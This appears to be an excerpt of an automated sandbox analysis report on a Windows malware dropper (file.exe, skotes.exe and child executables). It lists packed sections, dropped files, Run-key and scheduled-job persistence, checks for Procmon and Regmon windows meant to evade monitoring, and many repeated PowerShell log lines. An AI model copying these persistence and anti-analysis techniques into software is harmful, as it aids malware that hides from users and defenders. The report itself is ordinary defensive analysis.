Source: skotes.exe.0.dr Static PE information: section name: mnjwdapr
Source: skotes.exe.0.dr Static PE information: section name: .taggant
Source: random[1].exe.8.dr Static PE information: section name:
Source: random[1].exe.8.dr Static PE information: section name: .rsrc
Source: random[1].exe.8.dr Static PE information: section name: .idata
Source: random[1].exe.8.dr Static PE information: section name:
Source: random[1].exe.8.dr Static PE information: section name: spyqlfjc
Source: random[1].exe.8.dr Static PE information: section name: scxfhudm
Source: random[1].exe.8.dr Static PE information: section name: .taggant
Source: 8a145ab7b3.exe.8.dr Static PE information: section name:
Source: 8a145ab7b3.exe.8.dr Static PE information: section name: .rsrc
Source: 8a145ab7b3.exe.8.dr Static PE information: section name: .idata
Source: 8a145ab7b3.exe.8.dr Static PE information: section name:
Source: 8a145ab7b3.exe.8.dr Static PE information: section name: spyqlfjc
Source: 8a145ab7b3.exe.8.dr Static PE information: section name: scxfhudm
Source: 8a145ab7b3.exe.8.dr Static PE information: section name: .taggant
Source: cee706a53f.exe.8.dr Static PE information: section name:
Source: cee706a53f.exe.8.dr Static PE information: section name: .rsrc
Source: cee706a53f.exe.8.dr Static PE information: section name: .idata
Source: cee706a53f.exe.8.dr Static PE information: section name:
Source: cee706a53f.exe.8.dr Static PE information: section name: spyqlfjc
Source: cee706a53f.exe.8.dr Static PE information: section name: scxfhudm
Source: cee706a53f.exe.8.dr Static PE information: section name: .taggant
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 8_2_00D9D91C push ecx; ret 8_2_00D9D92F
Source: file.exe Static PE information: section name: entropy: 7.973222006352061
Source: file.exe Static PE information: section name: mmzmokro entropy: 7.95328168107565
Source: skotes.exe.0.dr Static PE information: section name: entropy: 7.973222006352061
Source: skotes.exe.0.dr Static PE information: section name: mmzmokro entropy: 7.95328168107565
Source: random[1].exe.8.dr Static PE information: section name: spyqlfjc entropy: 7.9536919163300555
Source: 8a145ab7b3.exe.8.dr Static PE information: section name: spyqlfjc entropy: 7.9536919163300555
Source: cee706a53f.exe.8.dr Static PE information: section name: spyqlfjc entropy: 7.9536919163300555
Drops PE files
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\1000026002\cee706a53f.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\random[1].exe Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Temp\1000023001\8a145ab7b3.exe Jump to dropped file

Boot Survival
barindex
Creates multiple autostart registry keys
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 8a145ab7b3.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run cee706a53f.exe Jump to behavior
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Source: C:\Users\user\Desktop\file.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: Filemonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000023001\8a145ab7b3.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000023001\8a145ab7b3.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000023001\8a145ab7b3.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000023001\8a145ab7b3.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000023001\8a145ab7b3.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\1000026002\cee706a53f.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\1000026002\cee706a53f.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\1000026002\cee706a53f.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\1000026002\cee706a53f.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\1000026002\cee706a53f.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\1000026002\cee706a53f.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000023001\8a145ab7b3.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1000023001\8a145ab7b3.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1000023001\8a145ab7b3.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1000023001\8a145ab7b3.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1000023001\8a145ab7b3.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1000023001\8a145ab7b3.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1000023001\8a145ab7b3.exe Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1000023001\8a145ab7b3.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window searched: window name: Regmonclass
Source: C:\Users\user\1000026002\cee706a53f.exe Window searched: window name: FilemonClass
Source: C:\Users\user\1000026002\cee706a53f.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\1000026002\cee706a53f.exe Window searched: window name: RegmonClass
Source: C:\Users\user\1000026002\cee706a53f.exe Window searched: window name: FilemonClass
Source: C:\Users\user\1000026002\cee706a53f.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\1000026002\cee706a53f.exe Window searched: window name: Regmonclass
Source: C:\Users\user\1000026002\cee706a53f.exe Window searched: window name: Filemonclass
Source: C:\Users\user\1000026002\cee706a53f.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1000023001\8a145ab7b3.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1000023001\8a145ab7b3.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1000023001\8a145ab7b3.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1000023001\8a145ab7b3.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1000023001\8a145ab7b3.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1000023001\8a145ab7b3.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1000023001\8a145ab7b3.exe Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1000023001\8a145ab7b3.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1000023001\8a145ab7b3.exe Window searched: window name: Regmonclass
Source: C:\Users\user\1000026002\cee706a53f.exe Window searched: window name: FilemonClass
Source: C:\Users\user\1000026002\cee706a53f.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\1000026002\cee706a53f.exe Window searched: window name: RegmonClass
Source: C:\Users\user\1000026002\cee706a53f.exe Window searched: window name: FilemonClass
Source: C:\Users\user\1000026002\cee706a53f.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\1000026002\cee706a53f.exe Window searched: window name: Regmonclass
Source: C:\Users\user\1000026002\cee706a53f.exe Window searched: window name: Filemonclass
Source: C:\Users\user\1000026002\cee706a53f.exe Window searched: window name: PROCMON_WINDOW_CLASS
Creates job files (autostart)
Source: C:\Users\user\Desktop\file.exe File created: C:\Windows\Tasks\skotes.job Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 8a145ab7b3.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 8a145ab7b3.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run cee706a53f.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run cee706a53f.exe Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
